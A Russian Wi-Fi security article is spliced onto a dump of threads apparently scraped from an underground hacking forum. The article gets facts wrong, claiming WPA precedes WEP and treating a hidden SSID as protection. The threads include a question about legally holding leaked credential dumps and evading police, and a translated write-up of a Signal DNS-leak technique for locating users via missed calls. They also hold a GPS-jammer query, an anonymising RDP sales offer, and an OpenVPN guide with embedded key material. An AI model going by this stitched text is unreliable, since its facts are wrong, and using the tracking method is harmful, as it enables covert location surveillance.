Когда другие люди смогут получить доступ к вашему Wi-Fi, скорее всего, ваш ежемесячный счет резко возрастет. Кроме того, другие люди, использующие ваше Wi-Fi соединение без вашего разрешения, значительно снизят скорость доступа в Интернет. В современную цифровую эпоху, когда Интернет является местом, где живут недобросовестные люди, безопасность Wi-Fi не может быть занижена.

Нетрудно защитить ваш Wi-Fi. В этой статье мы расскажем вам, как эффективно защитить сеть Wi-Fi и защитить себя и всех остальных пользователей в вашем доме или офисе от взлома. Первый шаг — рассмотреть тип безопасности вашего Wi- Fi.

Какого типа безопасности имеет ваш WiFi?
Первый шаг к тому, как обезопасить сети Wi-Fi от неавторизованных пользователей, — проверить тип безопасности, используемый вашей Wi-Fi.

Примечательно, что существует как минимум четыре беспроводных протокола, которые включают в себя:

Wired Equivalent Privacy (WEP)

Защищенный доступ Wi-Fi (WPA)

Защищенный доступ Wi-Fi 2 (WPA 2)

Защищенный доступ Wi-Fi 3 (WPA 3)

Прежде чем мы сможем подробно изучить упомянутые выше беспроводные протоколы, важно научиться определять тип используемой беспроводной безопасности. Помните, что тип вашей беспроводной сети будет WEP, WPA, WPA2 или WPA3. Ниже приведены инструкции по проверке типа используемой беспроводной безопасности:

Зайдите в настройки подключения Wi-Fi на вашем телефоне

В списке доступных сетей найдите свою конкретную беспроводную сеть.

Нажмите на нее, чтобы получить доступ к конфигурации сети

Конфигурация сети должна указывать тип используемой вами беспроводной защиты.

Если вы не можете выполнить вышеупомянутые действия на своем телефоне, попробуйте получить доступ к настройкам Wi-Fi на беспроводном маршрутизаторе.

Если у вас возникли проблемы, обратитесь за помощью к вашему интернет-провайдеру.

Однако более простой способ проверки на шифрование — использование приложения, известного как NetSpot, которое считается лучшим в отрасли. После того, как вы определили тип безопасности вашего Wi-Fi, вы должны убедиться, что он использует эффективный беспроводной протокол.

Что такое беспроводные протоколы безопасности?
Беспроводные протоколы предназначены для защиты беспроводных сетей, используемых в домах и зданиях других типов, от хакеров и неавторизованных пользователей. Как упоминалось ранее, существует четыре протокола безопасности беспроводной сети, каждый из которых отличается по силе и возможностям. Беспроводные протоколы также шифруют личные данные, передаваемые по радиоволнам. Это, в свою очередь, защищает ваши личные данные от хакеров и непреднамеренно защищает вас.

Ниже подробно рассматривается тип беспроводных протоколов, о которых должен знать каждый:

Wired Equivalent Privacy (WEP): это первый протокол безопасности беспроводной связи, когда-либо разработанный. Несмотря на то, что он был разработан в 1997 году, он все еще используется сегодня. Несмотря на это, он считается наиболее уязвимым и наименее безопасным протоколом безопасности беспроводной сети.

Защищенный доступ Wi-Fi (WPA): этот беспроводной протокол безопасности предшествует WEP. Следовательно, он предназначен для устранения недостатков, обнаруженных в протоколе WEP. В частности, для шифрования используется протокол целостности временного ключа (TKIP) и предварительный ключ (PSK).

Защищенный доступ Wi-Fi 2 (WPA 2): WPA 2, преемник WPA, обладает расширенными функциями и возможностями шифрования. Например, WPA 2 использует протокол кода аутентификации цепочки сообщений (CCMP) шифровального режима счетчика вместо (TKIP). Известно, что эта функция замены эффективна при шифровании данных. Следовательно, WPA 2 считается лучшим протоколом безопасности беспроводной сети.

Защищенный доступ Wi-Fi 3 (WPA 3): это недавний беспроводной протокол. Он улучшен с точки зрения возможностей шифрования и защиты хакеров от частных и общедоступных сетей.

Учитывая вышеприведенную информацию, было бы лучше убедиться, что ваш беспроводной протокол является WPA 2 или WPA 3. Если это не так, вы можете легко изменить свой протокол Wi-Fi на WPA 2. Никогда не используйте WEP для шифрования вашего беспроводная сеть, так как она очень слабая и неэффективная в лучшем случае.

Теперь, учитывая все вышесказанное, ниже приведены лучшие советы по безопасности WiFi.

Проверка мошеннических точек доступа Wi-Fi. Мошеннические точки доступа представляют серьезную угрозу безопасности, поскольку они обеспечивают доступ для хакеров. Лучший способ — провести опрос сайтов Wi-Fi в вашем доме или в здании компании. Лучшее приложение для этого — приложение NetSpot. Это приложение не только обнаруживает мошеннические точки доступа, но и эффективно избавляется от них.

Усиление шифрования Wi-Fi : чтобы усилить шифрование Wi-Fi, вам необходимо идентифицировать беспроводной протокол, как мы видели выше. Использование NetSpot поможет определить ваш тип шифрования.

Безопасный пароль WPA 2 : Измените пароль WPA 2 на что-то незаметное. Чтобы убедиться, что ваш пароль надежный, используйте разные символы и цифры.

Скрыть имя сети. Идентификатор вашего набора служб или SSID часто настроен на передачу имени вашей беспроводной сети. Это увеличивает вашу уязвимость. Вы можете легко переключиться на «скрытый», что затруднит для кого-либо подключение к нему, если они не знают тогда название вашей беспроводной сети.

Слито с форума ***************

The Art of memory forensics

ID: 676533bbb4103b69df371cbe
Thread ID: 37313
Created: 2020-05-14T07:49:36+0000
Last Post: 2020-07-15T16:34:46+0000
Author: Nordman
Prefix: Мануал/Книга
Replies: 1 Views: 1K

Download

Публичные базы, правовая основа использования

ID: 676533bbb4103b69df371cc1
Thread ID: 38542
Created: 2020-06-17T16:35:04+0000
Last Post: 2020-07-06T11:46:22+0000
Author: AleXXXey
Replies: 3 Views: 1K

Уважаемые знатоки,

у гугл.хромы есть фишка: вводишь пару логин/пароль в форме авторизации, и если она встречалась в утечках, хрома предупредит об этом. Получается, что гугл сам ведет базу таких пар, в т.ч. не относящихся к сервисам гугла (т.е. берет ее из публично слитых утечек). Любопытна правовая основа такой работы с этими базами. Означает ли это, что я, принятый с моей свалкой таких же баз, являюсь полностью в своем праве и вежливо шлю легавых лесом? В том числе и по административной стороне вопроса - штрафы и т.п.?
И если нет, то в чем разница?

Абузинг уязвимости в WebRTC для деанонимизации пользователей Signal

ID: 676533bbb4103b69df371cc3
Thread ID: 39185
Created: 2020-07-02T17:59:03+0000
Last Post: 2020-07-02T17:59:03+0000
Author: tabac
Prefix: Статья
Replies: 0 Views: 1K

Простота использования Signal Private Messenger, многоплатформенная поддержка и сквозное шифрование как сообщений, так и вызовов, становятся причиной роста популярности этого приложения. Сегодня им пользуется даже известный американский осведомитель Эдвард Сноуден: «Я использую Signal каждый день».

Я был очень рад увидеть, как быстро в Signal исправили найденную мною в этом месяце уязвимость, при помощи которой было возможно установить примерное местоположения любого пользователя, просто введя его номер в Signal (из - за утечки DNS-сервера - CVE-2020–5753). В случаях, если используется Google Public DNS (8.8.8.8/8.8.4.4) и схожие сервера, эта атака может сузить местоположение до города, в котором проживает искомый пользователь, в связи с использованием клиентской подсети EDNS.

Команда разработчиков Siganl сразу же сообщила всем, о том, что начала работу над обновлениями клиентов под Android и IOS. У этого приложения открытый исходный код, и, в соответствии с политикой раскрытия информации, они сообщают о проблемах, как только любой патч или информация, имеющая отношение к уязвимости, становится общедоступной (как в этом случае). Согласно нашему исследованию, на Android уязвимы версии Signal 4.59.0 и выше, в то время как для iOS уязвимое обновление WebRTC было представлено в версии 3.8.0.34.

Для некоторых пользователей эта уязвимость покажется критичной, в то время, как обычные обыватели ее вряд ли заметят. Стоит также отметить, что проблема возникает не из - за плохого кода сигнала (нет, с ним все в порядке), а из-за того, что DNS-запросы выполняет WebRTC. Другие приложения для обмена сообщениями также могут быть уязвимы. С момента обнаружения бага, Signal уведомил о нем команду Chromium и представил патч.

Сигнальная Сигнализация
Сигнал использует свой собственный форк WebRTC для голосовых / видео звонков на расстоянии. Чтобы WebRTC мог соединиться с удаленным одноранговым узлом, он должен найти валидное соединение для локального и удаленного однорангового узла связи. Он использует для этого технологию под названием «сигнализация», предполагающую использование промежуточного сервера-сигнализации, который обменивается публичными / частными IP-адресами каждого однорангового узла (ICE-кандидаты), чтобы каждый одноранговый узел мог обнаруживать друг друга и в конечном итоге устанавливать оптимальное соединение.

Для обеспечения защиты, Signal не будет отправлять ваши публичные/частные IP- адреса, если вызов осуществляется от кого-то, кого нет в списке контактов. Кроме того, если пользователь сигнала хочет скрыть свои частные/публичные IP- адреса даже от своих контактов, то на этот случай предусмотрена функция «Всегда ретранслировать вызовы» в параметрах конфиденциальности аккаунта, которая никогда не будет включать ваши публичные/частные IP-адреса в ICE- кандидаты. Вместо этого, Signal просто отправит IP-адрес ближайшего Signal TURN-сервера для того, чтобы вызывающий узел мог подключиться и ретранслировать аудио-/видеовызов через него. Еще одна интересная вещь, которую я заметил, заключается в том, что отправка ip-адреса происходит до того, как пользователь сигнала решит, ответить ли ему на вызов или нет. Я подумал, может ли такая реализация привести к интересной атаке, заключающейся в частичной деанонимизации пользователя, у которого может быть даже включен режим «Всегда ретранслировать вызовы».

Получение DNS по номеру телефона
Для того, чтобы понять, как это можно сделать, мне помог открытый исходный код мессенджера. Читая RFC для ICE, я обнаружил, что он поддерживает доменные имена для ICE-кандидатов.

: взято из RFC 4566 [RFC4566]. Это IP-адрес кандидата, который учитывает IPv4-адреса, IPv6-адреса и полные доменные имена (FQDN).

Click to expand...

Еще в 2018 году, в WebRTC была добавлена поддержка этих доменных имен https://webrtc-review.googlesource.com/c/src/+/85540/16. Поскольку под капотом Signal использует WebRTC, я решил, что можно просто указать доменное имя для одного из ICE-кандидатов, чтобы, когда я позвоню по телефону (и инициирую обмен ICE-кандидатами), у вызываемого абонента не было другого выбора, кроме как принять запрос. Если у меня будет авторитетный сервер имен для домена, я смогу зарегистрировать IP-адрес, который попытается запросить мой сервер имен. Этим IP-адресом будет DNS-сервер, используемый удаленным пользователем сигнала, который обычно географически близок к пользователю. И снова вызываемый абонент выполнит этот запрос еще до того, как решит, ответить ли ему на звонок. Фактически, я обнаружил, что могу легко вызвать DNS-запрос до того, как телефон даже «зазвонит», а затем завершить вызов, так что все, что увидит вызывающий абонент, это уведомление о «пропущенном вызове». Между тем, на моей стороне сервера имен мы увидим входящий DNS-запрос от текущего распознавателя DNS удаленного пользователя Signal.

Чтобы реализовать это, я просто изменил одну процедуру в Signal и скомпилировал приложение Signal под свой «атакующий» смартфон. [https://github.com/signalapp/Signal...ecuresms/service/WebRtcCallService.java#L1688](https://github.com/signalapp/Signal- Android/blob/3f7d0688fc76fd56ef0a562ae5293d91a67d6500/app/src/main/java/org/thoughtcrime/securesms/service/WebRtcCallService.java#L1688)

В нем я добавил дополнительных ICE-кандидатов в список iceCandidateParcels. Они содержали мой домен (для которого у меня есть авторитетный сервер имен).

Для каждого ICE-кандидата (а также для каждого вызова) я генерирую уникальный поддомен по двум причинам:

Определить конкретные входящие запросы в моем журнале имен

Убедиться, что он обойдет любое DNS-кэширование (поэтому я всегда заставляю DNS-сервер вызываемого абонента запрашивать мой сервер имен).

Результаты
После многократного тестирования, я обнаружил, что точность определения местоположения DNS обычно была в радиусе ~ 400 миль, в зависимости от конфигурации ISP / DNS, и могла ответить на такие вопросы, вроде, в какой стране, а иногда и в какой части страны, находится человек. Нужно учитывать не только идентификацию местоположения через DNS-сервер, но и определение местоположения через ISP-коммутаторы. Например, я сейчас сижу дома... эксплуатирую себя с помощью телефона с Signal... Запросы идут на DNS-сервер, который мой телефон использует в домашней сети, и вижу, что этот DNS-сервер от интернет-провайдера Cox в Южной Калифорнии... это правильно, так как я живу в Южной Калифорнии и использую Cox ISP.

Теперь я выхожу на улицу и иду к Starbucks, у меня включен 4G, я вновь использую технику таинственного пропущенного звонка, чтобы уличить новый DNS- сервер…

Хорошо ... похоже, это сервер Verizon DNS в Сан-Хосе, что указывает на то, что я, вероятно, удален от любой известной Wi-Fi-сети на мобильном операторе.

Затем я подключаюсь к Starbucks Wi-Fi. Я сделал еще один вызов с утечкой DNS, который выявил IP-адрес сервера OpenDNS в районе Южной Калифорнии.

Получив эту информацию, злоумышленник узнает, что меня сейчас нет дома. Если он пойдет дальше, он может даже создать профиль часто используемых DNS- серверов, которые я использую, чтобы наметить мои обычные местоположения, такие как «на работе», «дома», «в кафе», «в доме друга» и т. д.

Я проверил это в нескольких других местах и сетях. Один человек вызвался для теста. DNS-сервер мне пришел из Пенсильвании, в том же штате, в котором он находился во время моего тестирования.

Иногда мне приходили странные результаты. Например, однажды я находился в Калифорнии, будучи подключенным к одной Wi-Fi-сети в каком-то ресторане, а запросы определялись как из… Майами, Флорида.

В таких случаях повторяющаяся атака в течение недели поможет сузить радиус поисков, поскольку будет больше утечек DNS-серверов. Сопоставив несколько точек, мы сможем более точно определить местоположение.

Более точную информацию можно получить через клиентскую подсеть EDNS
Некоторые DNS-серверы, такие как часто используемый Google Public DNS (8.8.8.8/8.8.4.4), используют клиентскую подсеть EDNS. При ее использовании, часть IP-адреса исходного клиента (первые 3 октета) направляются на сервер имен.

Это позволяет resolver'ам передавать часть IP-адреса клиента (первые 24/56 бит или меньше для IPv4 / IPv6 соответственно) в качестве исходного IP- адреса в DNS-запросе. Серверы имен могут возвращать оптимизированные результаты, основываясь скорее на местоположении пользователя, чем Resolver'а.

Click to expand...

Давайте посмотрим несколько примеров. В этом случае утек DNS-сервер добровольца на Среднем Западе, который использует клиентскую подсеть EDNS. Нашему серверу имен были переданы первые 3 октета действительного IP-адреса пользователя (последние 2 октета размыты) в поле «Дополнительные записи / клиентская подсеть» запроса.

Эта IP-подсеть позволила узнать местоположение пользователя, чуть ли не в плотную (в паре миль от него).

После этого, я затестил этот способ на себе, так как находился в сети, используя Google Public DNS. После того, как я позвонил на свой телефон со своего номера, я задеанонил город, в котором я находился, после просмотра переадресованной клиентской подсети.

Вывод
Одна из самых больших проблем, которую я хотел обозначить в этой статье, заключается в том, что вы не можете запретить неизвестному номеру в Signal звонить на ваш телефон. Помимо этого, масло в огонь подливает клиентская подсеть EDNS, при использовании который, как мы видели, возможно точно определить ваше местоположение в городе. Если вы обеспокоены этим, я рекомендую обновить Signal Android до версии 4.59.11 или Signal iOS до версии 3.8.4. Если вы не можете выполнить обновление до этих версий, я рекомендую использовать VPN для туннелирования DNS-трафика. В ходе тестирования я обнаружил, что приложения Private Internet Access и Psiphon VPN предотвращают возможную утечку.

оригинал этого материала на английском можно [здесь](https://medium.com/tenable-techblog/turning-signal-app-into-a-coarse- tracking-device-643eb4298447).
автор перевода t.me/cybred

Вопрос от новичка про VPN

ID: 676533bbb4103b69df371cca
Thread ID: 38662
Created: 2020-06-21T11:31:25+0000
Last Post: 2020-06-21T19:15:33+0000
Author: TipicalUser
Replies: 6 Views: 1K

Добрый всем день. Я на форуме недавно, но хотел бы уже задать интересующий меня вопрос.
Я не занимаюсь ничем криминальным, но ценю свою анонимность и безопасность.

Хотел бы с вами проконсультироваться и услышать ваши мнения.

Какой VPN лучше выбрать? TorGuard VPN или PIA VPN?

На данный момент у меня такая связка:
PIA VPN > FireFox (Dynamic Fingerprint) > Tor ( Подключил прокси от тора 127.0.0.1:9150 )

Что порекомендуете для улучшения этой связки, чтобы не слишком сильно потерять в скорости и удобстве?

Официальный сниффинг Mozilla Firefox

ID: 676533bbb4103b69df371ccb
Thread ID: 38644
Created: 2020-06-20T18:36:56+0000
Last Post: 2020-06-20T19:51:29+0000
Author: lsenkoimo
Replies: 1 Views: 1K

Короче, поставил чистую семерку. Убрал просроченные серты в менеджере сертификатов винды, поставил последнюю мозилу 77.0.1 64 бита. Никакие настройки еще не делал.
Залез посмотреть, какие серты в самом браузере по умолчанию. И увидел странный прикол.

Сервер на *. Типа у какой-то организации есть доступ к ssl/https любого ресурса?

Проблема с Metasploit.

ID: 676533bbb4103b69df371cce
Thread ID: 38367
Created: 2020-06-11T20:12:00+0000
Last Post: 2020-06-11T20:39:19+0000
Author: void63
Replies: 1 Views: 1K

Пожалуйста помогите решить проблему.

websploit
Traceback (most recent call last):
File "/usr/local/bin/websploit", line 11, in
load_entry_point('websploit==4.0.4', 'console_scripts', 'websploit')()
File "/usr/lib/python2.7/dist-packages/pkg_resources/init.py", line 489, in load_entry_point
return get_distribution(dist).load_entry_point(group, name)
File "/usr/lib/python2.7/dist-packages/pkg_resources/init.py", line 2852, in load_entry_point
return ep.load()
File "/usr/lib/python2.7/dist-packages/pkg_resources/init.py", line 2443, in load
return self.resolve()
File "/usr/lib/python2.7/dist-packages/pkg_resources/init.py", line 2449, in resolve
module = import(self.module_name, fromlist=['name'], level=0)
File "/usr/local/lib/python2.7/dist- packages/websploit-4.0.4-py2.7.egg/websploit/websploit.py", line 34
module.prompt = f"wsf > {line} > "
^
SyntaxError: invalid syntax

del

ID: 676533bbb4103b69df371cd0
Thread ID: 37662
Created: 2020-05-22T13:52:55+0000
Last Post: 2020-05-22T15:31:31+0000
Author: cloud
Replies: 1 Views: 1K

del

Нужна проффесиональная консультация по ИБ

ID: 676533bbb4103b69df371cd3
Thread ID: 37592
Created: 2020-05-21T08:25:36+0000
Last Post: 2020-05-21T09:37:14+0000
Author: culture33
Replies: 4 Views: 1K

У нас есть весьма крупная организация, хотим вылезти из ледникового периода и провести индустриальный апгрейд. Нам нужны професиональные ответы по каждому пункту. По несколько штук на каждый. За уточнениями в ЛС.
Писать тех.документацию в 3 тома не стоит, нужно в тезисной форме(несколько штук). Глубоко ползти никуда не стоит. Не бойтесь использовать сложные технические слова, со всем разберёмся. За консультацию платим бетховенами.

Как предотвратить взлом\ постороннее вмешательство (расширеный ответ)

У нас есть клиенты. Где и как нам стоит хранить информацию о них? Как препятствовать утечке? Какие регламенты или протоколы существуют в этом плане?

Если в систему уже проникли, какие должны быть наши действия? Пошагово.

У нас есть особо важные ключи приложения. Как мы можем их защитить? Решает ли эту задачу MDM ?

Если мы увольняем сотрудника. Как мы можем проверить предотварить его дальнейший доступ в систему? Как мы можем понять остался ли у кого-то левого доступ? И Как мы можем мониторить кто сейчас неправомерно находится в нашей системе. Самой системы ещё нету. Но строить её изначально надо правильно.
6)(опционально) Известно ли вам про Mobile Device Management? Какое стороннее решение можете рекомендовать под среду Apple. В чём их преимущество и какой принцип работы?
Желательно от людей с репутацией и пониманием в данной сфере
спасибо

Существует ли тор (подобный как на андроиде) на iOS?

ID: 676533bbb4103b69df371cd5
Thread ID: 37374
Created: 2020-05-16T00:06:55+0000
Last Post: 2020-05-18T17:01:44+0000
Author: negg
Replies: 6 Views: 1K

Есть ли точные прототипы тора на iOS? На сайте тора читал,там говорилось мол на ios у нас тут такого тора, но есть копия onion browser, и типо он менее безопасный чем обычный тор. Вывод?

А есть такая утилита под linux, которая подключалась бы к списку проксей и пускала через них трафик?

ID: 676533bbb4103b69df371cd6
Thread ID: 37438
Created: 2020-05-17T20:28:45+0000
Last Post: 2020-05-17T20:28:45+0000
Author: EeXau1ei
Replies: 0 Views: 1K

Например можно найти проксилист анонимных серверов и пускать бы через них трафик, что бы програ сама переподключалась к серверам и перенаправляла трафик. соксы часто падают

Как на линуксе в nordvpn настроить double vpn?

ID: 676533bbb4103b69df371cd7
Thread ID: 37407
Created: 2020-05-16T21:31:07+0000
Last Post: 2020-05-17T12:13:53+0000
Author: EeXau1ei
Replies: 1 Views: 1K

Есть консольный клиент, там все пересмотрел не нашел как double vpn ключать, на их сайте есть упоминание этой функции, но не понятно как ее реализовать в терминале

Как работать с двумя провайдерами и больше

ID: 676533bbb4103b69df371cde
Thread ID: 37117
Created: 2020-05-07T12:32:46+0000
Last Post: 2020-05-07T12:32:46+0000
Author: Benihowy
Prefix: Статья
Replies: 0 Views: 1K

В этой статье рассмотрим способ реализации. Вопросы зачем и почему оставим без внимания. Итак, мы имеем 2 провайдера, способов подключения к ним два. Покупка роутера (оба провайдера проводные), который поддерживает такую опцию либо покупка сетевой карты. Рассмотрим второй вариант.
Если существуют поблизости точки доступа wi-fi, которыми можно воспользоваться, тогда нужно приобрести wi-fi сетевую карту, в таком количестве, в котором необходимо. Ведь одна карта может работать только с одой точкой доступа. Разберем на примере двух проводных провайдеров. Для удобства распознавания, переименуем их в wan и wan2

Красный крестик на картинке ничего не означает (это особенность действия виртуальных коммутаторов при физическом передергивание пачкорда)

Решать данную задачу будем с помощью виртуальных машин на гипервизоре hyper-v, на которые поставим windows 8 и файервол. Также каждая машина будет иметь по две сетевые виртуальные карты. Одни будут смотреть в сторону провайдеров, а другие в сторону клиента. Что бы добавить сетевые карты в машину, нужно создать виртуальный коммутатор, к которому и будет подключатся карта. Одна карта будет реплицироваться с реальной железкой (с той, что смотрит к провайдеру), вторая карта будет иметь частную сеть

На каждой машине поднимем прокси сервер сокс5 с помощью программы ccproxy, и указываем айпи адрес частной сети (192.168.2.1 на первой машине и 192.168.2.2 на второй и порты 9150). На каждой машине прописываем в файерволе правила, доступа к сокс порту 9150 для определенного айпи (192.168.2.3), а остальное блокируем. Теперь на третьей машине добавим сетевую карту и подключим ее к этой частной сети. Установим proxifier и впишем два айпи адреса машин wan и wan2

Теперь создадим цепочку и добавим в нее два эти прокси сервера

При нажатии кнопки type мы увидим следующее меню. На котором есть выбор трех положения работы цепочки – последовательно, избыточно, распределение нагрузки.
Последовательно означает пропуск трафика через первый айпи адрес, затем второй и тд. Избыточно – трафик идет только через первый адрес, но если он не доступен, то идет через второй и тд.
Распределение нагрузки – трафик разделяется между прокси серверами путем посылки каждого запроса на случайный прокси сервер

Нас интересует именно третий пункт. Теперь любому приложению можно указать эту цепочку и его трафик будет разделятся

Это не сработает для udp трафика. Если его нужно пропустить, то требуется разрешить маршрутизацию. Выбираем на какой провайдер будет идти трафик, и в той виртуальной машине делаем следующее

В таком случае нужно прописать транзитные правила файервола
Разрешаем прием трафика и машины 192.168.2.3
0.0.0.0(128.0.0.0), 128.0.0.0(128.0.0.0) означает любой айпи адрес, если адреса конкретные, то следует вписать их

Так, мы принимаем трафик, но его следует передавать дальше провайдеру

192.168.1.1 адрес wan2 (карта, что смотрит к провайдеру).

Установка и настройка OpenVPN сервера на windows

ID: 676533bbb4103b69df371ce0
Thread ID: 37099
Created: 2020-05-06T16:47:14+0000
Last Post: 2020-05-06T16:47:14+0000
Author: Benihowy
Prefix: Статья
Replies: 0 Views: 1K

В интернете существует много мануалов, как устанавливать openvpn на линуксовые и бсд операционные системы. На самом деле отличия не существенные, тот кто, умеет настраивать под линукс сможет и под виндовс. И так приступим, для начала нужно определится, на какую версию виндовса мы будет устанавливать. Для примера возьмём виртуальную машину с виндовс 8. На сайте https://openvpn.net/community-downloads/ предложат несколько вариантов

В процессе установки убедитесь в том, что все галочки компонентов установлены

Во избежание конфликтов с правами доступа устанавливаем сервер не в каталог по умолчанию (program files), а на диск C (можно устанавливать в любую другую созданную папку на любом диске)

Мы успешно установили сервер. Теперь произведем его настройку. В папке easy- rsa открываем vars.bat.sample; и приводим его к такому виду, удаляя комментарии. Также стоит изменить адрес каталога, показанного красным прямоугольников на скрине

В файлах build-ca.bat, build-dh.bat, build-key.bat, build-key-pass.bat, build- key-pkcs12.bat, build-key-serer.bat, меняем openssl на абсолютный ее пусть C:\openvpn\bin\openssl.exe

Теперь запускаем через командную строку файл vars.bat (это vars.bat.sample у которого удаляем .sample). Winkey+r => cmd и выполняем несколько команд:
cd C:\openvpn\easy-rsa
vars.bat
clean-all.bat
vars.bat

Теперь создадим ключи используя всё тот ту же строку. Используем файл build- ca.bat. В конце, будут вопросы, на которые нужно нажимать Enter

Далее запускаем build-dh.bat и ждем окончания создания ключа.
Теперь создадим сертификат для сервера. Очень важно, чтобы название сертификата (в данном случае changeme) совпадало с именем прописанным ранее в vars.bat в графе SET KEY_NAME

Как и в предыдущем случае, нужно соглашаться с предложенными ответами на вопросы, и где потребуется соглашаться, вводя клавишу “y”.
Теперь создадим файл конфигурации для сервера. В папке config создадим произвольный файл с расширением .ovpn. Пусть это будет server.ovpn. Прежде чем заполнить этот файл, нужно скопировать только что созданные файлы в другую папку, пусть она будет называется server_sert. Это делается только для удобства и совершено не обязательно

Открывает созданный ранее файл server.ovpn и заполняем так

port 65530
proto tcp
dev tun
dev-node "vpnadapter"
dh C:\\OpenVPN\\server_sert\\dh2048.pem
ca C:\\OpenVPN\\server_sert\\ca.crt
cert C:\\OpenVPN\\server_sert\\changeme.crt
key C:\\OpenVPN\\server_sert\\changeme.key
server 172.1.1.0 255.255.255.0
push "redirect-gateway def1"
push "dhcp-option DNS 8.8.8.8"
max-clients 1
keepalive 10 120
client-to-client
comp-lzo
persist-key
persist-tun
cipher AES-256-CBC
status C:\\OpenVPN\\log\\status.log
log C:\\OpenVPN\\log\\openvpn.log
verb 4
mute 20

В этом файле в данный момент несколько важных опций.
port 65531 – это порт, который будет принимать входящие соединения, можно указывать любой свободный.
proto tcp – протокол, по которому будут осуществляться работа сервера.
dev-node "vpnadapter" – название адаптера, который создался при установки openvpn сервера.
Для того, чтобы наши клиенты смогли осуществлять выход в интернет, нужно разрешить им это.
В свойствах адаптера (который смотрит наружу) разрешаем маршрутизацию виртуальному адаптеру

Вот мы и подошли к финальному шагу запуска сервера. Просто запускаем программу (ярлык на рабочем столе) и двойной клик по иконки на панели задач. Если все сделано верно, мы увидим зеленый цвет

Теперь нужно подключится к нашему серверу с другой машины. Для начала нужно сгенерировать сертификаты для клиента.
В папке easy-rsa\keys чистим файл index.txt
Через командную строку запускаем два файла

Теперь нужно скомпоновать файл конфигурации для клиентской машины. Создаем файл client.ovpn и заполняем его таким способом

client
resolv-retry infinite
nobind
remote 192.168.11.1 65530
proto tcp
dev tun
comp-lzo
float
cipher AES-256-CBC
keepalive 10 120
persist-key
persist-tun
verb 3
remote-cert-tls server

В этот файл следует вписать сертификаты и ключи находящиеся в этих файлах
в ca.crt
в vpn-client.crt
в vpn-client.key

После этого файл примет следующий вид

client
resolv-retry infinite
nobind
remote 192.168.11.1 65530
proto tcp
dev tun
comp-lzo
#ca ca.crt
#cert vpn-client.crt
#key vpn-client.key
float
cipher AES-256-CBC
keepalive 10 120
persist-key
persist-tun
verb 3
remote-cert-tls server

-----BEGIN CERTIFICATE-----
MIIGxzCCBK+gAwIBAgIJAJJrtpvEwoh4MA0GCSqGSIb3DQEBCwUAMIGdMQswCQYD
VQQGEwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEQMA4G
A1UEChMHT3BlblZQTjERMA8GA1UECxMIY2hhbmdlbWUxETAPBgNVBAMTCGNoYW5n

0nDverBXbKBz539Mr/X7aI/A4JIQbuj7oNBCFLKcp9wvIHABFo/RaDqC+7RKfr8d p8H/cvXBwr6qVhQjYBnfpa1U25hmufyAW4ajOrBGjg9SUmKug3dmp1gy/WcTSxny Ta1gnYHTrIxHJAuj3HMMSu84ELmALybGMdgs1c7CvPMk2pdOhYEMbbL/9FvJUIBU EAdtmoZ4E7ngNV0= \-----END CERTIFICATE----- </ca> <cert> \-----BEGIN CERTIFICATE----- MIIHDTCCBPWgAwIBAgIBAjANBgkqhkiG9w0BAQsFADCBnTELMAkGA1UEBhMCVVMx CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xEDAOBgNVBAoTB09w ZW5WUE4xETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQDEwhjaGFuZ2VtZTERMA8G ~~~~~~~~~~~~~~~Пропуск для экономии~~~~~~~~~~~~~ k9kfnqJn4bmxzeuqoH1UKPk3gT/LUC+o5fIpsgzrl+UZnib2jmXgsgqu2azHD9Pn ct7gE5JBoVTjJIUO+R5qBSO9IdSqrZL84EDh1fhnxrj33PiduZm9sKp3TcBM0dXr 8H7sLmsiaD5NaV3KJFXW0KzpTpc9VPaZLhNjDeiDNi91 \-----END CERTIFICATE----- </cert> <key> \-----BEGIN PRIVATE KEY----- MIIJRAIBADANBgkqhkiG9w0BAQEFAASCCS4wggkqAgEAAoICAQCuPgeSRi8U81TH J5r3Brrpf+whD+DI75HcwJ4TJSsDEdMGJpdY8NcKu3zZdJ3Qk56dEFUEELrFXYoL 0RNkxFdp5MhpdXDq5pBzA0lY5odVPJ4ytozCgpOXn2+NsauSy1bSPYUBNxDT2SQP ~~~~~~~~~~~~~~~Пропуск для экономии~~~~~~~~~~~~~ fAYTb2aoKnH+7TlfV6Ljx8XmDuBHCX388EWXfIKhLsIENhV8tgF7DV3RG5s8M/Hy 28nW+MYTeDK/kkPmhv7llcwCeWW4KbqG5sbBpJYa/ONdtP2Z4OYx3brW5Io8syaV 4GxJlI7UpATUWfopSzuWmB5jJzZAzPPZDau5mXy1ef70BInx5u3zzY57sp43fmV0 a6TuScwxm2BemRKoA/95a0Vx1H1uJiEz \-----END PRIVATE KEY----- </key> Файл конфигурации нужно положить в С:\пользователи\\[пользователь]\openvpn\config. Cделаем подключение к серверу.

слежка по GPS и так далее!!!

ID: 676533bbb4103b69df371ce1
Thread ID: 37077
Created: 2020-05-05T22:37:24+0000
Last Post: 2020-05-06T12:48:47+0000
Author: Ёрмунгард
Replies: 2 Views: 1K

доброго времени суток! Меня очень сильно интересует такая тема как слежка через возможные гео-данные GPS и так далее. Собственно созрел вопрос возможно ли создать такую глушилку, которая будет глушить все возможные геоданые и прочие радары?
Если возможно, то можно ли себя обеспечить доступом к этой глушилке и приэтом видеть все данные и правельное место нахождения себя, но при этом у остальных не будет сигнала даже со спутника. Заранее благодарю за все возможные ответы)

Безопасные RDP для работ любой сферы

ID: 676533bbb4103b69df371ce5
Thread ID: 36544
Created: 2020-04-20T12:19:40+0000
Last Post: 2020-04-20T13:01:12+0000
Author: MisterX
Replies: 1 Views: 1K

Есть ли у вас ощущение недосказанности в вопросах безопасности?

Есть хорошее решение для разных сфер деятельности.
Удаленный сервер с выходом в сеть через TOR.
Я сделал белый шлюз благодаря которому вы сможете не поднимать TOR на своей собственной машине.
Провайдер не будет смотреть на вас с подозрением, особенно если в вашей стране (РФ) запрещен TOR.
Исключены все выходные ноды в СНГ. Отключен WebRtc.

2 RAM 2 ядра 40 SSD win10 - 15$ месяц (Для серфинга в инете без сильных затрат ресурсов кому берите этот вариант)
6 RAM 4 ядра 60 SSD win10 - 25$ месяц (Этот вариант нужен для тех кому критично быстродействие, предыдущая сборка может виснуть если сильно нагрузить вкладками)

Все конфиги приведены для примера, можно подобрать индивидуально.
По вашему запросу могу сделать конфиги с серверными версиями систем.

Предложение сделано в первую очередь по причине того что на анологичных бордах нет подобных тем, либо цены на них слишком завышены.

